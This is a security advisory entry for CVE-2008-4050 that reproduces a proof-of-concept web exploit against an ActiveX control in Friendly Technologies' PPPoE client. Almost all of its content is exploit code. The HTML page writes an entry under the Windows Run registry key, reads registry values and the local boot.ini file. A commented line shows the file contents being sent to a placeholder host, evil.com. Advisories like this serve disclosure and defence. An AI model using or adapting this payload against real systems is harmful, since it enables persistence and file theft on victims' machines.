Topic : | Friendly Technologies Read/Write Registry/Read Files Exploit
|
SecurityAlert : 4244
CVE : CVE-2008-4050
CWE : CWE-20
SecurityRisk : High (About)
Remote Exploit : No
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : spdr
Published : 15.09.2008
Affected Software : | friendly_pppoe_client:3.0.0.57 |
 Advisory Content : <!--
Proof of Concept...
Read write to registry
and also read files
More codes at irc.nix.co.il/#binaryvision !
-->
<html>
<title>Friendly Technologies - Read/Write Registry</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B"
id='FT'></object>
<script language='Javascript'>
// Write to Registry
FT.RegistryValue (1, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
"Key Name Here", 1) = "Input Here";
// Read from Registry
var readreg = FT.RegistryValue (1, "SOFTWARE\\Friendly
Technologies\\FriendlyWeb Dialer", "Version", 1);
alert(readreg);
// Read from file
var readme=FT.GetTextFile("c:\\boot.ini");
alert(readme); // <img src="http://evil.com/postfiles.php?input="+readme
...
</script>
References :
http://www.securityfocus.com/bid/30940
http://www.securityfocus.com/bid/30939
http://www.milw0rm.com/exploits/6334
http://secunia.com/advisories/31644
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|